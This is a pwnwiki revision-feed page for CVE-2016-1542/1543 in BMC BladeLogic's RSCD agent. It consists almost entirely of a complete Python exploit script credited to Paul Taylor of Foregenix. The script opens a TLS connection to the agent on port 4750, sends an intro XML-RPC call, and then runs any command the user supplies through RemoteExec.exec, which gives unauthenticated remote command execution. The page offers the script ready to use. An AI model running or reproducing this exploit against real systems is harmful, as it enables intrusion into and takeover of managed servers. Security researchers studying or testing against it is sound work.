https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2016-1542_BMC_BladeLogic_8.3.00.64_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2016-1542 BMC BladeLogic 8.3.00.64 遠程命令執行漏洞 - Revision history
2026-04-15T01:04:50Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2016-1542_BMC_BladeLogic_8.3.00.64_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1532&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version # Filename: BMC_rexec.py # Github: https://github.com/bao7uo/bmc_bladelogic # Date: 2018-..."
2021-04-11T02:12:09Z
<p>Created page with "==EXP== <pre> # Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version # Filename: BMC_rexec.py # Github: https://github.com/bao7uo/bmc_bladelogic # Date: 2018-..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version<br />
# Filename: BMC_rexec.py<br />
# Github: https://github.com/bao7uo/bmc_bladelogic<br />
# Date: 2018-01-24<br />
# Exploit Author: Paul Taylor / Foregenix Ltd<br />
# Website: http://www.foregenix.com/blog<br />
# Version: BMC RSCD agent 8.3.00.64<br />
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)<br />
# Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-critical-security-issue-in-bmc-server-automation-cve-2016-1542-cve-2016-1543<br />
# Tested on: 8.3.00.64<br />
<br />
#!/usr/bin/python<br />
<br />
# BMC BladeLogic RSCD agent remote exec - XMLRPC version<br />
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)<br />
<br />
# By Paul Taylor / Foregenix Ltd<br />
<br />
# Credit: https://github.com/ernw/insinuator-snippets/tree/master/bmc_bladelogic<br />
# Credit: https://github.com/yaolga<br />
<br />
# Credit: Nick Bloor for AWS image for testing :-)<br />
# https://github.com/NickstaDB/PoC/tree/master/BMC_RSCD_RCE<br />
<br />
import socket<br />
import ssl<br />
import sys<br />
import argparse<br />
import requests<br />
import httplib<br />
from requests.packages.urllib3 import PoolManager<br />
from requests.packages.urllib3.connection import HTTPConnection<br />
from requests.packages.urllib3.connectionpool import HTTPConnectionPool<br />
from requests.adapters import HTTPAdapter<br />
<br />
<br />
class MyHTTPConnection(HTTPConnection):<br />
def __init__(self, unix_socket_url, timeout=60):<br />
HTTPConnection.__init__(self, HOST, timeout=timeout)<br />
self.unix_socket_url = unix_socket_url<br />
self.timeout = timeout<br />
<br />
def connect(self):<br />
self.sock = wrappedSocket<br />
<br />
<br />
class MyHTTPConnectionPool(HTTPConnectionPool):<br />
def __init__(self, socket_path, timeout=60):<br />
HTTPConnectionPool.__init__(self, HOST, timeout=timeout)<br />
self.socket_path = socket_path<br />
self.timeout = timeout<br />
<br />
def _new_conn(self):<br />
return MyHTTPConnection(self.socket_path, self.timeout)<br />
<br />
<br />
class MyAdapter(HTTPAdapter):<br />
def __init__(self, timeout=60):<br />
super(MyAdapter, self).__init__()<br />
self.timeout = timeout<br />
<br />
def get_connection(self, socket_path, proxies=None):<br />
return MyHTTPConnectionPool(socket_path, self.timeout)<br />
<br />
def request_url(self, request, proxies):<br />
return request.path_url<br />
<br />
<br />
def optParser():<br />
parser = argparse.ArgumentParser(<br />
description="Remote exec " +<br />
"BladeLogic Server Automation RSCD agent"<br />
)<br />
parser.add_argument("host", help="IP address of a target system")<br />
parser.add_argument(<br />
"-p",<br />
"--port",<br />
type=int,<br />
default=4750,<br />
help="TCP port (default: 4750)"<br />
)<br />
parser.add_argument("command", help="Command to execute")<br />
opts = parser.parse_args()<br />
return opts<br />
<br />
<br />
def sendXMLRPC(host, port, packet, tlsrequest):<br />
r = tlsrequest.post(<br />
'http://' + host + ':' + str(port) + '/xmlrpc', data=packet<br />
)<br />
print r.status_code<br />
print r.content<br />
return<br />
<br />
<br />
intro = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.intro</methodName><params><param><value>2016-1-14-18-10-30-3920958</value></param><param><value>7</value></param><param><value>0;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;</value></param><param><value>8.6.01.66</value></param></params></methodCall>"""<br />
options = optParser()<br />
rexec = options.command<br />
PORT = options.port<br />
HOST = options.host<br />
rexec = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteExec.exec</methodName><params><param><value>""" + rexec + """</value></param></params></methodCall>"""<br />
<br />
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
sock.connect((HOST, PORT))<br />
<br />
sock.sendall("TLSRPC")<br />
wrappedSocket = ssl.wrap_socket(sock)<br />
<br />
adapter = MyAdapter()<br />
s = requests.session()<br />
s.mount("http://", adapter)<br />
<br />
sendXMLRPC(HOST, PORT, intro, s)<br />
sendXMLRPC(HOST, PORT, rexec, s)<br />
<br />
wrappedSocket.close()<br />
</pre></div>
Pwnwiki